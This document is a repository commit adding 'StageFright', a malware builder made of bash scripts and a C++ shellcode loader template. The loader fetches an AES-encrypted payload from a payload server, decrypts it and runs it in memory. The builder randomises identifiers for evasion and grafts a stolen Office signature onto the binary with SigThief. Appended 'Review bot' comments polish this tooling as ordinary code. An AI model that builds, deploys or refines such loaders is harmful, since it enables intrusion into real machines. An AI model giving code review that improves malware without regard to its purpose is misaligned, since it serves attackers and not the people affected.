
Add files via upload

assume-breach 2 vuotta sitten
vanhempi
sitoutus
525b18583c

+ 181 - 0
StageFright/StageFright/StageFright/HTTP/HTTP.sh

@@ -0,0 +1,181 @@
+#!/bin/bash
+
+# Color variables
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+cat << "EOF"
+ _____ _                       _   _   _ _____ ___________ 
+/  ___| |                     | | | | | |_   _|_   _| ___ \
+\ `--.| |_ __ _  __ _  ___  __| | | |_| | | |   | | | |_/ /
+ `--. \ __/ _` |/ _` |/ _ \/ _` | |  _  | | |   | | |  __/ 
+/\__/ / || (_| | (_| |  __/ (_| | | | | | | |   | | | |    
+\____/ \__\__,_|\__, |\___|\__,_| \_| |_/ \_/   \_/ \_|    
+                 __/ |                                     
+                |___/                                      
+ _____                    _        _     _                 
+|  ___|                  | |      | |   | |                
+| |____  _____  ___ _   _| |_ __ _| |__ | | ___            
+|  __\ \/ / _ \/ __| | | | __/ _` | '_ \| |/ _ \           
+| |___>  <  __/ (__| |_| | || (_| | |_) | |  __/           
+\____/_/\_\___|\___|\__,_|\__\__,_|_.__/|_|\___|           
+                                                           
+EOF
+
+echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
+echo ""
+read Shellcode
+echo ""
+echo -e ${green}"What's The IP Of Your Payload Server?"${clear}
+echo ""
+read HOSTIP
+echo ""
+echo -e ${green}"Enter The Port Of Your Payload Server"${clear}
+echo ""
+read PORTY
+echo ""
+echo -e ${green}"Name Your Shellcode File. ex: invoice.txt"${clear}
+echo ""
+read SHELLCODEFILE
+echo ""
+echo -e ${green}"Name Your Malware! ex: malware.exe"${clear}
+echo ""
+read MALWARE
+echo ""
+cp StageFright/HTTP/template.cpp StageFright/HTTP/Resources/template.cpp
+echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
+echo ""
+sleep 2
+python3 StageFright/HTTP/Resources/aesencrypt.py $Shellcode > shell.txt
+echo -e ${yellow}"***Encryption Completed***"${clear}
+echo ""
+cp shell.txt shell2.txt
+
+#Generate AES Key
+keys=$(cat "shell2.txt")
+cut -d 'p' -f1 shell2.txt > shell3.txt
+keys=$(cat shell3.txt)
+keysnow=${keys#*=}
+sed -i "s/KEYVALUE/$keysnow/g" StageFright/HTTP/Resources/template.cpp
+
+#Generate AES Payload
+payload=$(cat "shell.txt")
+payloadnow=${payload#*;}
+payloadtoday=${payloadnow#*=}
+echo $payloadtoday > shell5.txt
+cp StageFright/HTTP/conv.py StageFright/HTTP/Resources/con.py
+perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i StageFright/HTTP/Resources/con.py
+sed -i "s/{/[/g" -i StageFright/HTTP/Resources/con.py
+sed -i "s/}/]/g" -i StageFright/HTTP/Resources/con.py
+sed -i "s/;//g" -i StageFright/HTTP/Resources/con.py
+python3 StageFright/HTTP/Resources/con.py
+#rm StageFright/HTTP/Resources/con.py
+mv payload.bin $SHELLCODEFILE
+sleep 2
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomE=$(cat shell.txt)
+sed -i "s/RandomE/$RandomE/g" StageFright/HTTP/Resources/template.cpp
+
+
+#Replace IP, PORT and SHELLCODEFILE
+sed -i "s/HOSTIP/$HOSTIP/g" StageFright/HTTP/Resources/template.cpp
+sed -i "s/PORTY/$PORTY/g" StageFright/HTTP/Resources/template.cpp
+sed -i "s/SHELLCODEFILE/$SHELLCODEFILE/g" StageFright/HTTP/Resources/template.cpp
+#Replacing Values
+
+# Get Payload From URL Function
+
+#FindShare
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random1=$(cat shell.txt)
+sed -i "s/Random1/$Random1/g" StageFright/HTTP/Resources/template.cpp
+
+#pPayloadBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+Random2=$(cat shell.txt)
+sed -i "s/Random2/$Random2/g" StageFright/HTTP/Resources/template.cpp
+
+#sPayloadSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random3=$(cat shell.txt)
+sed -i "s/Random3/$Random3/g" StageFright/HTTP/Resources/template.cpp
+
+#bSTATE
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
+Random5=$(cat shell.txt)
+sed -i "s/Random5/$Random5/g" StageFright/HTTP/Resources/template.cpp
+
+#sSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-7} | head -n 1 > shell.txt
+Random6=$(cat shell.txt)
+sed -i "s/Random6/$Random6/g" StageFright/HTTP/Resources/template.cpp
+
+#hInternet
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random7=$(cat shell.txt)
+sed -i "s/Random7/$Random7/g" StageFright/HTTP/Resources/template.cpp
+
+#dwBytesRead
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-13} | head -n 1 > shell.txt
+Random8=$(cat shell.txt)
+sed -i "s/Random8/$Random8/g" StageFright/HTTP/Resources/template.cpp
+
+#pBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random9=$(cat shell.txt)
+sed -i "s/Random9/$Random9/g" StageFright/HTTP/Resources/template.cpp
+
+#PAYLOAD
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomA=$(cat shell.txt)
+sed -i "s/RandomA/$RandomA/g" StageFright/HTTP/Resources/template.cpp
+
+#Sleep Function
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomJ=$(cat shell.txt)
+sed -i "s/RandomJ/$RandomJ/g" StageFright/HTTP/Resources/template.cpp
+
+#AES KEY NAME
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+RandomK=$(cat shell.txt)
+sed -i "s/RandomK/$RandomK/g" StageFright/HTTP/Resources/template.cpp
+
+# Main Function
+
+#Bytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomB=$(cat shell.txt)
+sed -i "s/RandomB/$RandomB/g" StageFright/HTTP/Resources/template.cpp
+
+#Size
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomC=$(cat shell.txt)
+sed -i "s/RandomC/$RandomC/g" StageFright/HTTP/Resources/template.cpp
+
+#Compile
+
+echo -e ${yellow}"+++Compiling Malware+++"${clear}
+x86_64-w64-mingw32-g++ -o $MALWARE StageFright/HTTP/Resources/template.cpp -Wno-narrowing -fpermissive -lws2_32 -lntdll -lwininet -O2 >/dev/null 2>&1
+echo ""
+sleep 2
+rm shell*
+echo -e ${yellow}"***Malware Compiled***"${clear}
+echo ""
+sleep 2
+echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
+echo ""
+sleep 2
+python3 StageFright/Resources/SigThief/sigthief.py -i StageFright/Resources/OfficeSetup.exe -t $MALWARE -o signed$MALWARE >/dev/null 2>&1
+mv signed$MALWARE $MALWARE
+echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
+echo ""
+
+
+
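Review bot: Every identifier-length pipeline, from `fold -w ${1:-11}` for RandomE down to the RandomC one, takes its width from the script's first positional argument, so invoking `HTTP.sh 3` silently shrinks every generated name to three letters; the intent is a literal width, e.g. `fold -w 11`. The values read from the user are expanded unquoted in `python3 StageFright/HTTP/Resources/aesencrypt.py $Shellcode > shell.txt`, `mv payload.bin $SHELLCODEFILE`, the `-o $MALWARE` compile line and the `sed -i "s/HOSTIP/$HOSTIP/g"` family, so a path containing a space, or a value containing `/`, breaks the command or the sed expression — quote them and use a delimiter such as `|` in those sed scripts. `rm shell*` deletes anything in the current directory whose name starts with `shell`, including a user's own `shellcode.bin` if the script is run from the folder that holds it; name the temporaries explicitly, `rm -f -- shell.txt shell2.txt shell3.txt shell5.txt`. All paths are relative (`StageFright/HTTP/...`), so the script only works from the directory containing that tree and would benefit from a top-of-file comment saying so, and the three `sed -i "s/{/[/g" -i ...` lines pass `-i` twice, which appears to rely on GNU sed tolerating a repeated flag. HTTPDLL/HTTPDLL.sh has the same defects line for line.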

+ 26 - 0
StageFright/StageFright/StageFright/HTTP/Resources/aesencrypt.py

@@ -0,0 +1,26 @@
+# Red Team Operator course code template
+# payload encryption with AES
+# 
+# author: reenz0h (twitter: @SEKTOR7net)
+
+import sys
+from base64 import b64encode
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import pad
+from Crypto.Random import get_random_bytes
+import hashlib
+
+KEY = get_random_bytes(16)
+iv = 16 * b'\x00'
+cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
+
+try:
+    plaintext = open(sys.argv[1], "rb").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
+
+print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
+print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

+ 0 - 0
StageFright/StageFright/StageFright/HTTP/Resources/con.py


+ 221 - 0
StageFright/StageFright/StageFright/HTTP/Resources/template.cpp

@@ -0,0 +1,221 @@
+
+#include <windows.h>
+#include <stdio.h>
+#include <wincrypt.h>
+#include <wininet.h>
+#include <ntstatus.h>
+
+#pragma comment(lib, "crypt32.lib")
+#pragma comment(lib, "advapi32.lib")
+#pragma comment(lib, "wininet.lib")
+
+typedef NTSTATUS(WINAPI* PNTALLOCATEVIRTUALMEMORY)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    ULONG_PTR ZeroBits,
+    PSIZE_T RegionSize,
+    ULONG AllocationType,
+    ULONG Protect
+);
+
+typedef NTSTATUS(WINAPI* PNTFREEVIRTUALMEMORY)(
+    HANDLE ProcessHandle,
+    PVOID BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG FreeType
+);
+
+typedef NTSTATUS(WINAPI* PNTPROTECTVIRTUALMEMORY)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG NewProtect,
+    PULONG OldProtect
+);
+
+static NTSTATUS(__stdcall* NtDelayExecution)(BOOL Alertable, PLARGE_INTEGER DelayInterval) =
+    (NTSTATUS(__stdcall*)(BOOL, PLARGE_INTEGER))GetProcAddress(GetModuleHandle("ntdll.dll"), "NtDelayExecution");
+
+static NTSTATUS(__stdcall* ZwSetTimerResolution)(IN ULONG RequestedResolution, IN BOOLEAN Set, OUT PULONG ActualResolution) =
+    (NTSTATUS(__stdcall*)(ULONG, BOOLEAN, PULONG))GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwSetTimerResolution");
+
+static void Random4(float milliseconds) {
+    static bool once = true;
+    if (once) {
+        ULONG actualResolution;
+        ZwSetTimerResolution(1, true, &actualResolution);
+        once = false;
+    }
+
+    LARGE_INTEGER interval;
+    interval.QuadPart = -1 * (int)(milliseconds * 10000.0f);
+    NtDelayExecution(false, &interval);
+}
+
+PNTALLOCATEVIRTUALMEMORY NtAllocateVirtualMemory =
+    (PNTALLOCATEVIRTUALMEMORY)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAllocateVirtualMemory");
+
+BOOL TxZsIgHLMj(LPCWSTR szUrl, PBYTE* SGTVVskiX, SIZE_T* pBufferSize) {
+    BOOL bSuccess = TRUE;
+    HINTERNET hInternet = NULL;
+    HINTERNET hUrl = NULL;
+    SIZE_T totalSize = 0;
+    PBYTE pBuffer = NULL;
+    PBYTE pTempBuffer = NULL;
+    DWORD bytesRead = 0;
+
+    // Open Internet session handle
+    hInternet = InternetOpenW(L"Microsoft", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
+    if (hInternet == NULL) {
+        wprintf(L"[!] InternetOpenW Failed With Error : %d \n", GetLastError());
+        bSuccess = FALSE;
+        goto _EndOfFunction;
+    }
+
+    // Open handle to the payload using the payload's URL
+    hUrl = InternetOpenUrlW(hInternet, szUrl, NULL, 0, INTERNET_FLAG_HYPERLINK | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, 0);
+    if (hUrl == NULL) {
+        wprintf(L"[!] InternetOpenUrlW Failed With Error : %d \n", GetLastError());
+        bSuccess = FALSE;
+        goto _EndOfFunction;
+    }
+
+    // Allocate 1024 bytes for the temp buffer
+    pTempBuffer = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 1024);
+    if (pTempBuffer == NULL) {
+        bSuccess = FALSE;
+        goto _EndOfFunction;
+    }
+
+    while (TRUE) {
+        // Read 1024 bytes to the temp buffer
+        if (!InternetReadFile(hUrl, pTempBuffer, 1024, &bytesRead)) {
+            wprintf(L"[!] InternetReadFile Failed With Error : %d \n", GetLastError());
+            bSuccess = FALSE;
+            goto _EndOfFunction;
+        }
+
+        // Calculate the total size of the buffer
+        totalSize += bytesRead;
+
+        // If the total buffer is not allocated yet, allocate it
+        if (pBuffer == NULL)
+            pBuffer = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, totalSize);
+        else
+            pBuffer = (PBYTE)HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, pBuffer, totalSize);
+
+        if (pBuffer == NULL) {
+            bSuccess = FALSE;
+            goto _EndOfFunction;
+        }
+
+        // Append the temp buffer to the end of the total buffer
+        memcpy(pBuffer + (totalSize - bytesRead), pTempBuffer, bytesRead);
+
+        // Clean up the temp buffer
+        memset(pTempBuffer, 0, bytesRead);
+
+        // If less than 1024 bytes were read, exit the loop
+        if (bytesRead < 1024) {
+            break;
+        }
+    }
+
+    // Save results
+    *SGTVVskiX = pBuffer;
+    *pBufferSize = totalSize;
+
+_EndOfFunction:
+    // Cleanup
+    if (hInternet) InternetCloseHandle(hInternet);
+    if (hUrl) InternetCloseHandle(hUrl);
+
+    return bSuccess;
+}
+
+int RXWUKYjHiBac(char* difern, unsigned int difern_len, char* SDtXZSWsy, size_t SDtXZSWsylen) {
+    HCRYPTPROV hProv;
+    HCRYPTHASH hHash;
+    HCRYPTKEY hKey;
+
+    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+        return -1;
+    }
+
+    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
+        return -1;
+    }
+
+    if (!CryptHashData(hHash, (BYTE*)SDtXZSWsy, (DWORD)SDtXZSWsylen, 0)) {
+        return -1;
+    }
+
+    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
+        return -1;
+    }
+    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, (BYTE*)difern, &difern_len)) {
+        return -1;
+    }
+
+    CryptReleaseContext(hProv, 0);
+    CryptDestroyHash(hHash);
+    CryptDestroyKey(hKey);
+
+    return 0;
+}
+
+char SDtXZSWsy[] =  { 0xa1, 0xc6, 0xd8, 0x17, 0x54, 0xe2, 0x8f, 0x64, 0x42, 0xe8, 0xac, 0x80, 0x91, 0xa7, 0x21, 0xe0 };
+
+int main() {
+    // URL to download the payload from
+    LPCWSTR szUrl = L"http://192.168.1.19:9090/invoice.txt";  // Replace with your actual URL
+
+    PBYTE SGTVVskiX;
+    SIZE_T SGTVVskiXSize = 0;
+
+    FreeConsole();
+
+    // Download the payload
+    if (!TxZsIgHLMj(szUrl, &SGTVVskiX, &SGTVVskiXSize)) {
+        printf("[!] TxZsIgHLMj Failed\n");
+        return 1;
+    }
+
+    // Decrypt payload
+    RXWUKYjHiBac((char*)SGTVVskiX, SGTVVskiXSize, SDtXZSWsy, sizeof(SDtXZSWsy));
+
+    // Allocate Virtual Memory
+    void* exec = NULL;
+    SIZE_T size = SGTVVskiXSize;
+    NTSTATUS status = NtAllocateVirtualMemory(
+        GetCurrentProcess(),
+        &exec,
+        0,
+        &size,
+        MEM_COMMIT | MEM_RESERVE,
+        PAGE_READWRITE
+    );
+    
+    // Copy shellcode into allocated memory
+    memcpy(exec, SGTVVskiX, SGTVVskiXSize);
+
+    // Change the memory protection to RX (Read and Execute)
+    DWORD oldProtect;
+   
+if (VirtualProtect(exec, size, PAGE_EXECUTE_READ, &oldProtect) == 0) {
+    // Handle error if needed
+    return -1;
+}
+
+    // Execute shellcode in memory
+    ((void(*)())exec)();
+
+    // Free the allocated memory using NtFreeVirtualMemory
+    PNTFREEVIRTUALMEMORY NtFreeVirtualMemory =
+        (PNTFREEVIRTUALMEMORY)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtFreeVirtualMemory");
+    SIZE_T regionSize = 0;
+    status = NtFreeVirtualMemory(GetCurrentProcess(), &exec, &regionSize, MEM_RELEASE);
+
+    return 0;
+}
+
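Review bot: This file is the output of HTTP.sh rather than source: the script copies HTTP/template.cpp to this path and sed-substitutes the identifiers, key and URL, which is why it carries a concrete 16-byte initializer at `char SDtXZSWsy[] =` and a filled-in host, port and filename in `szUrl`, while HTTP/template.cpp still holds the `KEYVALUE` and `HOSTIP:PORTY/SHELLCODEFILE` placeholders. Checking in a generated build (together with Resources/con.py and invoice.txt) pins one particular key and the author's own test address into the repository history for good. Drop the three generated files from the commit, list `StageFright/HTTP/Resources/template.cpp`, `StageFright/HTTP/Resources/con.py` and the produced payload file in .gitignore, and re-enable the commented-out `#rm StageFright/HTTP/Resources/con.py` cleanup in HTTP.sh so later runs do not leave them behind. The `// Replace with your actual URL` comment on the `szUrl` line is copied through from the template and is misleading in an already-substituted file.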

+ 4 - 0
StageFright/StageFright/StageFright/HTTP/conv.py

@@ -0,0 +1,4 @@
+buf=PAYVAL 
+payload = bytes(bytearray(buf))
+with open('payload.bin', 'wb') as f:
+    f.write(payload)
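Review bot: `payload = bytes(bytearray(buf))` converts twice; `payload = bytes(buf)` yields the identical object once the builder has rewritten the initializer into a list. The trailing space after `PAYVAL` on the first line survives the perl substitution but serves no purpose and should be trimmed.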

BIN
StageFright/StageFright/StageFright/HTTP/invoice.txt


+ 221 - 0
StageFright/StageFright/StageFright/HTTP/template.cpp

@@ -0,0 +1,221 @@
+
+#include <windows.h>
+#include <stdio.h>
+#include <wincrypt.h>
+#include <wininet.h>
+#include <ntstatus.h>
+
+#pragma comment(lib, "crypt32.lib")
+#pragma comment(lib, "advapi32.lib")
+#pragma comment(lib, "wininet.lib")
+
+typedef NTSTATUS(WINAPI* PNTALLOCATEVIRTUALMEMORY)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    ULONG_PTR ZeroBits,
+    PSIZE_T RegionSize,
+    ULONG AllocationType,
+    ULONG Protect
+);
+
+typedef NTSTATUS(WINAPI* PNTFREEVIRTUALMEMORY)(
+    HANDLE ProcessHandle,
+    PVOID BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG FreeType
+);
+
+typedef NTSTATUS(WINAPI* PNTPROTECTVIRTUALMEMORY)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG NewProtect,
+    PULONG OldProtect
+);
+
+static NTSTATUS(__stdcall* NtDelayExecution)(BOOL Alertable, PLARGE_INTEGER DelayInterval) =
+    (NTSTATUS(__stdcall*)(BOOL, PLARGE_INTEGER))GetProcAddress(GetModuleHandle("ntdll.dll"), "NtDelayExecution");
+
+static NTSTATUS(__stdcall* ZwSetTimerResolution)(IN ULONG RequestedResolution, IN BOOLEAN Set, OUT PULONG ActualResolution) =
+    (NTSTATUS(__stdcall*)(ULONG, BOOLEAN, PULONG))GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwSetTimerResolution");
+
+static void Random4(float milliseconds) {
+    static bool once = true;
+    if (once) {
+        ULONG actualResolution;
+        ZwSetTimerResolution(1, true, &actualResolution);
+        once = false;
+    }
+
+    LARGE_INTEGER interval;
+    interval.QuadPart = -1 * (int)(milliseconds * 10000.0f);
+    NtDelayExecution(false, &interval);
+}
+
+PNTALLOCATEVIRTUALMEMORY NtAllocateVirtualMemory =
+    (PNTALLOCATEVIRTUALMEMORY)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAllocateVirtualMemory");
+
+BOOL Random3(LPCWSTR szUrl, PBYTE* RandomB, SIZE_T* pBufferSize) {
+    BOOL bSuccess = TRUE;
+    HINTERNET hInternet = NULL;
+    HINTERNET hUrl = NULL;
+    SIZE_T totalSize = 0;
+    PBYTE pBuffer = NULL;
+    PBYTE pTempBuffer = NULL;
+    DWORD bytesRead = 0;
+
+    // Open Internet session handle
+    hInternet = InternetOpenW(L"Microsoft", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
+    if (hInternet == NULL) {
+        wprintf(L"[!] InternetOpenW Failed With Error : %d \n", GetLastError());
+        bSuccess = FALSE;
+        goto _EndOfFunction;
+    }
+
+    // Open handle to the payload using the payload's URL
+    hUrl = InternetOpenUrlW(hInternet, szUrl, NULL, 0, INTERNET_FLAG_HYPERLINK | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, 0);
+    if (hUrl == NULL) {
+        wprintf(L"[!] InternetOpenUrlW Failed With Error : %d \n", GetLastError());
+        bSuccess = FALSE;
+        goto _EndOfFunction;
+    }
+
+    // Allocate 1024 bytes for the temp buffer
+    pTempBuffer = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 1024);
+    if (pTempBuffer == NULL) {
+        bSuccess = FALSE;
+        goto _EndOfFunction;
+    }
+
+    while (TRUE) {
+        // Read 1024 bytes to the temp buffer
+        if (!InternetReadFile(hUrl, pTempBuffer, 1024, &bytesRead)) {
+            wprintf(L"[!] InternetReadFile Failed With Error : %d \n", GetLastError());
+            bSuccess = FALSE;
+            goto _EndOfFunction;
+        }
+
+        // Calculate the total size of the buffer
+        totalSize += bytesRead;
+
+        // If the total buffer is not allocated yet, allocate it
+        if (pBuffer == NULL)
+            pBuffer = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, totalSize);
+        else
+            pBuffer = (PBYTE)HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, pBuffer, totalSize);
+
+        if (pBuffer == NULL) {
+            bSuccess = FALSE;
+            goto _EndOfFunction;
+        }
+
+        // Append the temp buffer to the end of the total buffer
+        memcpy(pBuffer + (totalSize - bytesRead), pTempBuffer, bytesRead);
+
+        // Clean up the temp buffer
+        memset(pTempBuffer, 0, bytesRead);
+
+        // If less than 1024 bytes were read, exit the loop
+        if (bytesRead < 1024) {
+            break;
+        }
+    }
+
+    // Save results
+    *RandomB = pBuffer;
+    *pBufferSize = totalSize;
+
+_EndOfFunction:
+    // Cleanup
+    if (hInternet) InternetCloseHandle(hInternet);
+    if (hUrl) InternetCloseHandle(hUrl);
+
+    return bSuccess;
+}
+
+int Random1(char* difern, unsigned int difern_len, char* Random2, size_t Random2len) {
+    HCRYPTPROV hProv;
+    HCRYPTHASH hHash;
+    HCRYPTKEY hKey;
+
+    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+        return -1;
+    }
+
+    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
+        return -1;
+    }
+
+    if (!CryptHashData(hHash, (BYTE*)Random2, (DWORD)Random2len, 0)) {
+        return -1;
+    }
+
+    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
+        return -1;
+    }
+    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, (BYTE*)difern, &difern_len)) {
+        return -1;
+    }
+
+    CryptReleaseContext(hProv, 0);
+    CryptDestroyHash(hHash);
+    CryptDestroyKey(hKey);
+
+    return 0;
+}
+
+char Random2[] = KEYVALUE
+
+int main() {
+    // URL to download the payload from
+    LPCWSTR szUrl = L"http://HOSTIP:PORTY/SHELLCODEFILE";  // Replace with your actual URL
+
+    PBYTE RandomB;
+    SIZE_T RandomBSize = 0;
+
+    FreeConsole();
+
+    // Download the payload
+    if (!Random3(szUrl, &RandomB, &RandomBSize)) {
+        printf("[!] Random3 Failed\n");
+        return 1;
+    }
+
+    // Decrypt payload
+    Random1((char*)RandomB, RandomBSize, Random2, sizeof(Random2));
+
+    // Allocate Virtual Memory
+    void* exec = NULL;
+    SIZE_T size = RandomBSize;
+    NTSTATUS status = NtAllocateVirtualMemory(
+        GetCurrentProcess(),
+        &exec,
+        0,
+        &size,
+        MEM_COMMIT | MEM_RESERVE,
+        PAGE_READWRITE
+    );
+    
+    // Copy shellcode into allocated memory
+    memcpy(exec, RandomB, RandomBSize);
+
+    // Change the memory protection to RX (Read and Execute)
+    DWORD oldProtect;
+   
+if (VirtualProtect(exec, size, PAGE_EXECUTE_READ, &oldProtect) == 0) {
+    // Handle error if needed
+    return -1;
+}
+
+    // Execute shellcode in memory
+    ((void(*)())exec)();
+
+    // Free the allocated memory using NtFreeVirtualMemory
+    PNTFREEVIRTUALMEMORY NtFreeVirtualMemory =
+        (PNTFREEVIRTUALMEMORY)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtFreeVirtualMemory");
+    SIZE_T regionSize = 0;
+    status = NtFreeVirtualMemory(GetCurrentProcess(), &exec, &regionSize, MEM_RELEASE);
+
+    return 0;
+}
+
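Review bot: `char Random2[] = KEYVALUE` just above `int main()` has no terminating semicolon and only compiles because HTTP.sh substitutes a value that ends in `};`; that contract is invisible from this file, so either write `char Random2[] = KEYVALUE;` and have the script strip the trailing `;` from the generated initializer, or add the comment `// KEYVALUE is replaced by HTTP.sh with a complete "{ ... };" initializer, semicolon included`. The `if (VirtualProtect(...) == 0)` block inside `main` sits at column 0 and reads as if it were outside the function; re-indent it to match the surrounding body. `status` is assigned from `NtAllocateVirtualMemory` and again from `NtFreeVirtualMemory` but never read, and the `PNTPROTECTVIRTUALMEMORY` typedef is declared but never used, so both are dead declarations that can be removed. The indentation and dead-declaration points hold equally for the generated copy under HTTP/Resources/.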

+ 186 - 0
StageFright/StageFright/StageFright/HTTPDLL/HTTPDLL.sh

@@ -0,0 +1,186 @@
+#!/bin/bash
+
+# Color variables
+red='\033[0;31m'
+green='\033[0;32m'
+yellow='\033[0;33m'
+blue='\033[0;34m'
+magenta='\033[0;35m'
+cyan='\033[0;36m'
+# Clear the color after that
+clear='\033[0m'
+cat << "EOF"
+ _____ _                       _   _   _ _____ ___________ 
+/  ___| |                     | | | | | |_   _|_   _| ___ \
+\ `--.| |_ __ _  __ _  ___  __| | | |_| | | |   | | | |_/ /
+ `--. \ __/ _` |/ _` |/ _ \/ _` | |  _  | | |   | | |  __/ 
+/\__/ / || (_| | (_| |  __/ (_| | | | | | | |   | | | |    
+\____/ \__\__,_|\__, |\___|\__,_| \_| |_/ \_/   \_/ \_|    
+                 __/ |                                     
+                |___/                                                  
+______ _      _                                            
+|  _  \ |    | |                                           
+| | | | |    | |                                           
+| | | | |    | |                                           
+| |/ /| |____| |____                                       
+|___/ \_____/\_____/      
+                                                           
+EOF
+
+echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
+echo ""
+read Shellcode
+echo ""
+echo -e ${green}"What's The IP Of Your Payload Server?"${clear}
+echo ""
+read HOSTIP
+echo ""
+echo -e ${green}"Enter The Port Of Your Payload Server"${clear}
+echo ""
+read PORTY
+echo ""
+echo -e ${green}"Name Your Shellcode File. ex: invoice.txt"${clear}
+echo ""
+read SHELLCODEFILE
+echo ""
+echo -e ${green}"Name Your EntryPoint. ex: Go"${clear}
+echo ""
+read ENTRYPOINT
+echo ""
+echo -e ${green}"Name Your Malware! ex: malware.dll"${clear}
+echo ""
+read MALWARE
+echo ""
+cp StageFright/HTTPDLL/template.cpp StageFright/HTTPDLL/Resources/template.cpp
+echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
+echo ""
+sleep 2
+python3 StageFright/HTTPDLL/Resources/aesencrypt.py $Shellcode > shell.txt
+echo -e ${yellow}"***Encryption Completed***"${clear}
+echo ""
+cp shell.txt shell2.txt
+
+#Generate AES Key
+keys=$(cat "shell2.txt")
+cut -d 'p' -f1 shell2.txt > shell3.txt
+keys=$(cat shell3.txt)
+keysnow=${keys#*=}
+sed -i "s/KEYVALUE/$keysnow/g" StageFright/HTTPDLL/Resources/template.cpp
+
+#Generate AES Payload
+payload=$(cat "shell.txt")
+payloadnow=${payload#*;}
+payloadtoday=${payloadnow#*=}
+echo $payloadtoday > shell5.txt
+cp StageFright/HTTPDLL/conv.py StageFright/HTTPDLL/Resources/con.py
+perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i StageFright/HTTPDLL/Resources/con.py
+sed -i "s/{/[/g" -i StageFright/HTTPDLL/Resources/con.py
+sed -i "s/}/]/g" -i StageFright/HTTPDLL/Resources/con.py
+sed -i "s/;//g" -i StageFright/HTTPDLL/Resources/con.py
+python3 StageFright/HTTPDLL/Resources/con.py
+#rm StageFright/HTTPDLL/Resources/con.py
+mv payload.bin $SHELLCODEFILE
+sleep 2
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomE=$(cat shell.txt)
+sed -i "s/RandomE/$RandomE/g" StageFright/HTTPDLL/Resources/template.cpp
+
+
+#Replace IP, PORT and SHELLCODEFILE
+sed -i "s/HOSTIP/$HOSTIP/g" StageFright/HTTPDLL/Resources/template.cpp
